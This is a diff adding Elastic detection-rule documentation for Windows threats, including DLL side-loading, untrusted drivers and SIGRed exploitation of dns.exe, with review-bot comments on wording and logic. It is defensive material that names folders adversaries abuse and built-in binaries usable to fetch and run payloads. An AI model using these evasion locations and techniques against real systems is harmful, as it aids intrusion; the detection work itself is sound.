"?:\\Windows\\diagnostics\\*", + "?:\\Windows\\TAPI\\*", + "?:\\Windows\\INF\\*", + "?:\\Windows\\System32\\Speech\\*", + "?:\\windows\\tracing\\*", + "?:\\windows\\IME\\*", + "?:\\Windows\\Performance\\*", + "?:\\windows\\intel\\*", + "?:\\windows\\ms\\*", + "?:\\Windows\\dot3svc\\*", + "?:\\Windows\\panther\\*", + "?:\\Windows\\RemotePackages\\*", + "?:\\Windows\\OCR\\*", + "?:\\Windows\\appcompat\\*", + "?:\\Windows\\apppatch\\*", + "?:\\Windows\\addins\\*", + "?:\\Windows\\Setup\\*", + "?:\\Windows\\Help\\*", + "?:\\Windows\\SKB\\*", + "?:\\Windows\\Vss\\*", + "?:\\Windows\\servicing\\*", + "?:\\Windows\\CbsTemp\\*", + "?:\\Windows\\Logs\\*", + "?:\\Windows\\WaaS\\*", + "?:\\Windows\\twain_32\\*", + "?:\\Windows\\ShellExperiences\\*", + "?:\\Windows\\ShellComponents\\*", + "?:\\Windows\\PLA\\*", + "?:\\Windows\\Migration\\*", + "?:\\Windows\\debug\\*", + "?:\\Windows\\Cursors\\*", + "?:\\Windows\\Containers\\*", + "?:\\Windows\\Boot\\*", + "?:\\Windows\\bcastdvr\\*", + "?:\\Windows\\TextInput\\*", + "?:\\Windows\\security\\*", + "?:\\Windows\\schemas\\*", + "?:\\Windows\\SchCache\\*", + "?:\\Windows\\Resources\\*", + "?:\\Windows\\rescache\\*", + "?:\\Windows\\Provisioning\\*", + "?:\\Windows\\PrintDialog\\*", + "?:\\Windows\\PolicyDefinitions\\*", + "?:\\Windows\\media\\*", + "?:\\Windows\\Globalization\\*", + "?:\\Windows\\L2Schemas\\*", + "?:\\Windows\\LiveKernelReports\\*", + "?:\\Windows\\ModemLogs\\*", + "?:\\Windows\\ImmersiveControlPanel\\*", + "?:\\$Recycle.Bin\\*") + ) and + + not dll.hash.sha256 : + ("3ed33e71641645367442e65dca6dab0d326b22b48ef9a4c2a2488e67383aa9a6", + "b4db053f6032964df1b254ac44cb995ffaeb4f3ade09597670aba4f172cf65e4", + "214c75f678bc596bbe667a3b520aaaf09a0e50c364a28ac738a02f867a085eba", + "23aa95b637a1bf6188b386c21c4e87967ede80242327c55447a5bb70d9439244", + "5050b025909e81ae5481db37beb807a80c52fc6dd30c8aa47c9f7841e2a31be7") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** 
ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Create or Modify System Process +** ID: T1543 +** Reference URL: https://attack.mitre.org/techniques/T1543/ +* Sub-technique: +** Name: Windows Service +** ID: T1543.003 +** Reference URL: https://attack.mitre.org/techniques/T1543/003/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: System Services +** ID: T1569 +** Reference URL: https://attack.mitre.org/techniques/T1569/ +* Sub-technique: +** Name: Service Execution +** ID: T1569.002 +** Reference URL: https://attack.mitre.org/techniques/T1569/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unsigned-dll-side-loading-from-a-suspicious-folder.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unsigned-dll-side-loading-from-a-suspicious-folder.asciidoc new file mode 100644 index 0000000000..0dde7bd432 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unsigned-dll-side-loading-from-a-suspicious-folder.asciidoc 
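Review bot: `"?:\\Windows\\security\\*"` appears twice in the `dll.path` list (once after `"?:\\Windows\\ServiceState\\*"` and again after `"?:\\Windows\\TextInput\\*"`); the duplicate is harmless to EQL but should be removed to keep the list maintainable. Also, the description ("Identifies an unsigned library created in the last 5 minutes and subsequently loaded by a shared windows service") only describes the `dll.Ext.relative_file_creation_time <= 300` branch of the `or`; the rule equally fires on an unsigned DLL loaded by svchost from any of the listed unusual paths regardless of file age, and the description should say so (and capitalise "Windows").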
@@ -0,0 +1,161 @@ +[[prebuilt-rule-8-10-5-unsigned-dll-side-loading-from-a-suspicious-folder]] +=== Unsigned DLL Side-Loading from a Suspicious Folder + +Identifies a Windows trusted program running from locations often abused by adversaries to masquerade as a trusted program and loading a recently dropped DLL. This behavior may indicate an attempt to evade defenses via side-loading a malicious DLL within the memory space of a signed processes. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +library where host.os.type == "windows" and + + process.code_signature.trusted == true and + + (dll.Ext.relative_file_creation_time <= 500 or dll.Ext.relative_file_name_modify_time <= 500) and + + not dll.code_signature.status : ("trusted", "errorExpired", "errorCode_endpoint*", "errorChaining") and + + /* Suspicious Paths */ + dll.path : ("?:\\PerfLogs\\*.dll", + "?:\\Users\\*\\Pictures\\*.dll", + "?:\\Users\\*\\Music\\*.dll", + "?:\\Users\\Public\\*.dll", + "?:\\Users\\*\\Documents\\*.dll", + "?:\\Windows\\Tasks\\*.dll", + "?:\\Windows\\System32\\Tasks\\*.dll", + "?:\\Intel\\*.dll", + "?:\\AMD\\Temp\\*.dll", + "?:\\Windows\\AppReadiness\\*.dll", + "?:\\Windows\\ServiceState\\*.dll", + "?:\\Windows\\security\\*.dll", + "?:\\Windows\\System\\*.dll", + 
"?:\\Windows\\IdentityCRL\\*.dll", + "?:\\Windows\\Branding\\*.dll", + "?:\\Windows\\csc\\*.dll", + "?:\\Windows\\DigitalLocker\\*.dll", + "?:\\Windows\\en-US\\*.dll", + "?:\\Windows\\wlansvc\\*.dll", + "?:\\Windows\\Prefetch\\*.dll", + "?:\\Windows\\Fonts\\*.dll", + "?:\\Windows\\diagnostics\\*.dll", + "?:\\Windows\\TAPI\\*.dll", + "?:\\Windows\\INF\\*.dll", + "?:\\windows\\tracing\\*.dll", + "?:\\windows\\IME\\*.dll", + "?:\\Windows\\Performance\\*.dll", + "?:\\windows\\intel\\*.dll", + "?:\\windows\\ms\\*.dll", + "?:\\Windows\\dot3svc\\*.dll", + "?:\\Windows\\ServiceProfiles\\*.dll", + "?:\\Windows\\panther\\*.dll", + "?:\\Windows\\RemotePackages\\*.dll", + "?:\\Windows\\OCR\\*.dll", + "?:\\Windows\\appcompat\\*.dll", + "?:\\Windows\\apppatch\\*.dll", + "?:\\Windows\\addins\\*.dll", + "?:\\Windows\\Setup\\*.dll", + "?:\\Windows\\Help\\*.dll", + "?:\\Windows\\SKB\\*.dll", + "?:\\Windows\\Vss\\*.dll", + "?:\\Windows\\Web\\*.dll", + "?:\\Windows\\servicing\\*.dll", + "?:\\Windows\\CbsTemp\\*.dll", + "?:\\Windows\\Logs\\*.dll", + "?:\\Windows\\WaaS\\*.dll", + "?:\\Windows\\twain_32\\*.dll", + "?:\\Windows\\ShellExperiences\\*.dll", + "?:\\Windows\\ShellComponents\\*.dll", + "?:\\Windows\\PLA\\*.dll", + "?:\\Windows\\Migration\\*.dll", + "?:\\Windows\\debug\\*.dll", + "?:\\Windows\\Cursors\\*.dll", + "?:\\Windows\\Containers\\*.dll", + "?:\\Windows\\Boot\\*.dll", + "?:\\Windows\\bcastdvr\\*.dll", + "?:\\Windows\\TextInput\\*.dll", + "?:\\Windows\\schemas\\*.dll", + "?:\\Windows\\SchCache\\*.dll", + "?:\\Windows\\Resources\\*.dll", + "?:\\Windows\\rescache\\*.dll", + "?:\\Windows\\Provisioning\\*.dll", + "?:\\Windows\\PrintDialog\\*.dll", + "?:\\Windows\\PolicyDefinitions\\*.dll", + "?:\\Windows\\media\\*.dll", + "?:\\Windows\\Globalization\\*.dll", + "?:\\Windows\\L2Schemas\\*.dll", + "?:\\Windows\\LiveKernelReports\\*.dll", + "?:\\Windows\\ModemLogs\\*.dll", + "?:\\Windows\\ImmersiveControlPanel\\*.dll", + "?:\\$Recycle.Bin\\*.dll") and + + /* DLL loaded from the 
process.executable current directory */ + endswith~(substring(dll.path, 0, length(dll.path) - (length(dll.name) + 1)), substring(process.executable, 0, length(process.executable) - (length(process.name) + 1))) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Sub-technique: +** Name: DLL Side-Loading +** ID: T1574.002 +** Reference URL: https://attack.mitre.org/techniques/T1574/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-untrusted-driver-loaded.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-untrusted-driver-loaded.asciidoc new file mode 100644 index 0000000000..743c082dca --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-untrusted-driver-loaded.asciidoc 
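Review bot: the description reads "within the memory space of a signed processes"; it should be "a signed process". As in the ICMLuaUtil rule in this patch, the `==== Investigation guide` heading sits over an empty `[source, markdown]` block and renders as an empty box; drop both when there is no guide. The final `endswith~(substring(dll.path, ...), substring(process.executable, ...))` clause is doing the real side-loading work (the DLL must be loaded from the trusted executable's own directory), but its only explanation is the comment `/* DLL loaded from the process.executable current directory */` that is split across a line; a sentence in the description stating that the recently dropped DLL must sit beside the trusted executable would make the rule's intent and its tuning surface clear.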
@@ -0,0 +1,135 @@ +[[prebuilt-rule-8-10-5-untrusted-driver-loaded]] +=== Untrusted Driver Loaded + +Identifies attempt to load an untrusted driver. Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/hfiref0x/TDL +* https://docs.microsoft.com/en-us/previous-versions/windows/hardware/design/dn653559(v=vs.85)?redirectedfrom=MSDN + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 6 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Untrusted Driver Loaded + +Microsoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. + +This protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security. + +This rule identifies an attempt to load an untrusted driver, which effectively means that DSE was disabled or bypassed. This can indicate that the system was compromised. 
+ +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context: + - Identify the path that the driver was loaded from. If you're using Elastic Defend, path information can be found in the `dll.path` field. + - Examine the file creation and modification timestamps: + - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `dll.Ext.relative_file_name_modify_time` fields. The values are in seconds. + - Search for file creation events sharing the same file name as the `dll.name` field and identify the process responsible for the operation. + - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes. + - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. +- Use Osquery to investigate the drivers loaded into the system. 
+ - !{osquery{"label":"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \"Microsoft\" AND signed == \"1\")\n"}} + - !{osquery{"label":"Osquery - Retrieve All Unsigned Drivers with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \"0\"\n"}} +- Identify the driver's `Device Name` and `Service Name`. +- Check for alerts from the rules specified in the `Related Rules` section. + +### False positive analysis + +- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk. + +### Related Rules + +- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9 +- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd +- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.) +- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed. 
+ - This can be done via PowerShell `Remove-Service` cmdlet. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Ensure that the Driver Signature Enforcement is enabled on the system. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+ +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +driver where host.os.type == "windows" and process.pid == 4 and + dll.code_signature.trusted != true and + not dll.code_signature.status : ("errorExpired", "errorRevoked") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-child-process-of-dns-exe.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-child-process-of-dns-exe.asciidoc new file mode 100644 index 0000000000..60e48b20c8 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-child-process-of-dns-exe.asciidoc 
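Review bot: "Identifies attempt to load an untrusted driver" is missing the article ("Identifies an attempt"). In the Response and remediation list, the step "This can be done via PowerShell `Remove-Service` cmdlet" needs a version caveat: `Remove-Service` only exists in PowerShell 6 and later, so on a host running Windows PowerShell 5.1 the responder has to fall back to `sc.exe delete <service name>`; since this step is about cleaning up a compromised host where the newer shell may well not be installed, the guide should name the fallback.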
@@ -0,0 +1,113 @@ +[[prebuilt-rule-8-10-5-unusual-child-process-of-dns-exe]] +=== Unusual Child Process of dns.exe + +Identifies an unexpected process spawning from dns.exe, the process responsible for Windows DNS server services, which may indicate activity related to remote code execution or other forms of exploitation. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/ +* https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/ +* https://github.com/maxpl0it/CVE-2020-1350-DoS +* https://www.elastic.co/security-labs/detection-rules-for-sigred-vulnerability + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Use Case: Vulnerability +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Unusual Child Process of dns.exe + +SIGRed (CVE-2020-1350) is a wormable, critical vulnerability in the Windows DNS server that affects Windows Server versions 2003 to 2019 and can be triggered by a malicious DNS response. Because the service is running in elevated privileges (SYSTEM), an attacker that successfully exploits it is granted Domain Administrator rights. This can effectively compromise the entire corporate infrastructure. 
+ +This rule looks for unusual children of the `dns.exe` process, which can indicate the exploitation of the SIGRed or a similar remote code execution vulnerability in the DNS server. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. + - Any suspicious or abnormal child process spawned from dns.exe should be carefully reviewed and investigated. It's impossible to predict what an adversary may deploy as the follow-on process after the exploit, but built-in discovery/enumeration utilities should be top of mind (`whoami.exe`, `netstat.exe`, `systeminfo.exe`, `tasklist.exe`). + - Built-in Windows programs that contain capabilities used to download and execute additional payloads should also be considered. This is not an exhaustive list, but ideal candidates to start out would be: `mshta.exe`, `powershell.exe`, `regsvr32.exe`, `rundll32.exe`, `wscript.exe`, `wmic.exe`. + - If a denial-of-service (DoS) exploit is successful and DNS Server service crashes, be mindful of potential child processes related to `werfault.exe` occurring. +- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes. +- Investigate other alerts associated with the host during the past 48 hours. +- Check whether the server is vulnerable to CVE-2020-1350. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. 
+- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Reimage the host operating system or restore the compromised server to a clean state. +- Install the latest patches on systems that run Microsoft DNS Server. +- Consider the implementation of a patch management system, such as the Windows Server Update Services (WSUS). +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Review the privileges assigned to the user to ensure that the least privilege principle is being followed. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and process.parent.name : "dns.exe" and + not process.name : "conhost.exe" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Exploitation of Remote Services +** ID: T1210 +** Reference URL: https://attack.mitre.org/techniques/T1210/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-executable-file-creation-by-a-system-critical-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-executable-file-creation-by-a-system-critical-process.asciidoc new file mode 100644 index 0000000000..cac3f2c790 
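Review bot: in the guide, "exploitation of the SIGRed or a similar remote code execution vulnerability" should drop "the" ("exploitation of SIGRed"). The step "Check whether the server is vulnerable to CVE-2020-1350" gives the analyst nothing to act on; point it at the MSRC advisory already listed under `*References*`, which carries the affected versions and patch information. Also, the guide warns that a failed DoS attempt can surface `werfault.exe` as a child of `dns.exe`, yet the query excludes only `conhost.exe`, so those crashes will alert under this rule; the False positive analysis section should state that a `werfault.exe` child still warrants triage as a possible crashed exploitation attempt rather than being filed as benign.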
--- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-executable-file-creation-by-a-system-critical-process.asciidoc 
@@ -0,0 +1,139 @@ +[[prebuilt-rule-8-10-5-unusual-executable-file-creation-by-a-system-critical-process]] +=== Unusual Executable File Creation by a System Critical Process + +Identifies an unexpected executable file being created or modified by a Windows system critical process, which may indicate activity related to remote code execution or other forms of exploitation. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Unusual Executable File Creation by a System Critical Process + +Windows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is file operations. + +This rule looks for the creation of executable files done by system-critical processes. This can indicate the exploitation of a vulnerability or a malicious process masquerading as a system-critical process. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. 
+ +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the process executable using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. 
+ - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). 
+ - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "windows" and event.type != "deletion" and + file.extension : ("exe", "dll") and + process.name : ("smss.exe", + "autochk.exe", + "csrss.exe", + "wininit.exe", + "services.exe", + "lsass.exe", + "winlogon.exe", + "userinit.exe", + "LogonUI.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Exploitation for Defense Evasion +** ID: T1211 +** Reference URL: https://attack.mitre.org/techniques/T1211/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Exploitation for Client Execution +** ID: T1203 +** Reference URL: https://attack.mitre.org/techniques/T1203/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-file-modification-by-dns-exe.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-file-modification-by-dns-exe.asciidoc new file mode 100644 index 0000000000..1997fa1413 --- /dev/null 
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-file-modification-by-dns-exe.asciidoc 
@@ -0,0 +1,83 @@ +[[prebuilt-rule-8-10-5-unusual-file-modification-by-dns-exe]] +=== Unusual File Modification by dns.exe + +Identifies an unexpected file being modified by dns.exe, the process responsible for Windows DNS Server services, which may indicate activity related to remote code execution or other forms of exploitation. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/ +* https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/ +* https://www.elastic.co/security-labs/detection-rules-for-sigred-vulnerability + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Data Source: Elastic Endgame +* Use Case: Vulnerability +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Unusual File Write +Detection alerts from this rule indicate potential unusual/abnormal file writes from the DNS Server service process (`dns.exe`) after exploitation from CVE-2020-1350 (SigRed) has occurred. Here are some possible avenues of investigation: +- Post-exploitation, adversaries may write additional files or payloads to the system as additional discovery/exploitation/persistence mechanisms. +- Any suspicious or abnormal files written from `dns.exe` should be reviewed and investigated with care. 
